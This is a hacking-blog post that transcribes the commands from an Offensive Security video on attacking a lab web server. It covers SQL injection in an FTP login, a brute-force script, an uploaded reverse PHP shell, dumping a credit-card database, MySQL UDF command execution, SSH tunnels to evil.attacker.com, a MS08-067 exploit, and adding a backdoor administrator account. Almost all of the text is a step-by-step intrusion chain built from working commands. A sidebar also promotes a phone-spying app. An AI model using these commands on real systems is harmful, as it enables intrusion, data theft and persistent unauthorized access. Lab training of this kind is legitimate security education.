Penetration Testing in the Real World Offensive Security Video Tutorial

Hacking, cracking and penetration testing are the hot topics of this blog and we have discussed different tutorials based on backtrack Linux specially backtrack 5 R1 because it is the newest one, however there are many video tutorials of backtrack Linux available that has been made on previous version of backtrack like backtrack 4 and others. The main aim and idea is same means to educate people how to do a penetration testing. Offensive security.

I think there is no need to introduce offensive security, I was searching on Internet and I have found a wonderful video tutorial made by offensive security team.


This video will teach you about remote penetration testing and how to enumerate and map the internal network of a web server (database, SMS and other servers). Although this video has been created on previous version of backtrack but it is applicable on backtrack 5 r1 because tools are common.



Commands & Tools that Discussed on the Video

ftp-brute.py

#!/usr/bin/python
from ftplib import FTP
print “Attempting user Directory Discover via FTP”
for i in range(0,6):
username=%’) and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT “+ STR(I)+”,1; — ”
password=str(“1”)
ftp=FTP(‘www.offseclabs.com’)
ftp.login(username,password)
print “Logged in as user “+str(i)+”,1″
ftp.retrlines(‘LIST’)
ftp.close()

Open Terminal A : 

nmap -p 21,80 www.offseclabs.com
nc -v www.offseclabs.com 80
HEAD / HTTP/1.0
(To enumerate the webserver)
clear
ftp www.offseclabs.com
username – bob
password – bob
(To enumerate the ftp server)
ftp www.offseclabs.com
username – %’) and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser; —
password – 1
(logged in to the ftp server)
pwd
ls
bye
clear
cd core
clear
nano brute.py –> (see above ftp-brute.py)
./brute.py
(get the fifth user who has mapped to the root directory of webserver)
clear
ftp www.offseclabs.com
username – %’) and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT 5,1; —
password – 1
(logged in as the fifth user)
ls
put rs.php –> (a reverse php shell) Download reverse PHP shell
———————–
Open Terminal B :
nc -lvp 80
———————–
Open Terminal C :
wget www.offseclabs.com/rs.php
(Then, at Terminal B, we got a reverse shell)
———————–
Go back to Terminal B :
(inside the reverse shell)
/sbin/ifconfig
pwd
cd /var/www
ls -la
cd includes
cat configure.php
(get the MySQL username and password as well as MySQL server address and database name)
mysqldump -u root -p1q2w3e4r5t6y -h 10.150.0.5 oscommerce > /var/www/images/ccdump.txt
————————
Open a Firefox :
www.offseclabs.com/images/ccdump.txt
(we got the database dump)
————————-
Go back to Terminal A :
(inside the ftp server)
put up.html –> (file upload html file)
put up.php — > (file upload php file)
————————-
Open Firefox :
www.offseclabs.com/up.html
(upload lib_mysqludf_sys.so and marked it as 1)
(upload rs [a binary reverse shell) and marked it as 2)
** Details of lib_mysqludf_sys.so
—————————
Go back to Terminal A :
(quit the ftp server)
bye
clear
exit
(quit Terminal A)
—————————-
Go back to Terminal B :
mysql -u root -p1q2w3e4r5t6y -h 10.150.0.5
(login to MySQL server)
use pwn;
SELECT imgdata from binfile where title=”1″ into dumpfile ‘/usr/lib/lib_mysqludf_sys.so’;
SELECT imgdata from binfile where title=”2″ into dumpfile ‘/tmp/db’;
CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME ‘lib_mysqludf_sys.so’;
CREATE FUNCTION sys_get RETURNS string SONAME ‘lib_mysqludf_sys.so’;
CREATE FUNCTION sys_set RETURNS int SONAME ‘lib_mysqludf_sys.so’;
CREATE FUNCTION sys_exec RETURNS int SONAME ‘lib_mysqludf_sys.so’;
CREATE FUNCTION sys_eval RETURNS string SONAME ‘lib_mysqludf_sys.so’;
SELECT sys_eval(‘chmod 755 /tmp/bd’);
SELECT sys_eval(‘/tmp/bd &’);
(don’t press Enter at this moment)
—————————
Open Terminal D :
nc -lvp 80
(go back to Terminal B and press enter, you will get reserver shell at Terminal D)
—————————-
Open Terminal E :
nc -lvp 80
—————————-
Go back to Terminal B :
(inside the MySQL server)
SELECT sys_eval(‘/tmp/bd &’);
(press enter and we got another reverse shell at Terminal E)
—————————
Go back to Terminal E :
(inside the reverse shell)
ping -c 1 10.150.0.20
clear
ssh -l root -t -t -R 445:10.150.0.20:445 evil.attacker.com
(create a remote tunnel at port 445)
—————————–
Open Terminal F :
netstat antp
nmap -sS 127.0.0.1 -p445 –script smb-check-vulns.nse
—————————–
Go back to Terminal D :
ssh -l root -t -t -R 4444:10.150.0.20:4444 evil.attacker.com
(create a remote tunnel at port 4444)
clear
——————————
Go back to Terminal F :
cd core
nano nx.py –> (a ms08-067 python exploit for win2k3 sp2)
clear
./nx.py 127.0.0.1
nc -v 127.0.0.1 4444
(we got a remote shell of 10.150.0.20)
ip config
net user hacker hacker /add
net localgroup administrators hacker /add
———————————
Go back to Terminal D :
(quit the tunnel)
exit
clear
ssh -l root -t -t -R 3389:10.150.0.20:3389 evil.attacker.com
(create another remote tunnel on port 3389)
clear
———————————–
Open Terminal G :
netstat -antp | grep LISTEN
clear
rdesktop 127.0.0.1
(login to the 10.150.0.20 with username – hacker and password – hacker)



Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.
Ehacking Staff
With more than 50 global partners, we are proud to count the world’s leading cybersecurity training provider. EH Academy is the brainchild of Ehacking, which has been involved in the field of training since the past Five years and continues to help in creating professional IT experts.

Most Popular

Top 10 things to Do After Installing Kali Linux

Kali Linux is considered to be one of the best hacking distribution of this era, it is developed by Offensive Security to give an...

Become a spy in your own right with Xnspy Android spying app

Having become widely popular among parents and employers, spying apps have become quite the norm nowadays. Android spying apps have made it a lot...

e-Services Portals Potentially Expose Government Infrastructure to File-based Attacks

More and more users are embracing technology to perform their day-to-day activities. It’s not only private businesses that are forced to establish digital channels...

What is Nmap? How to use Nmap for Information Gathering

Nmap stands for Network Mapper, a powerful network scanning and host detection tool that is being used to perform reconnaissance in a very first...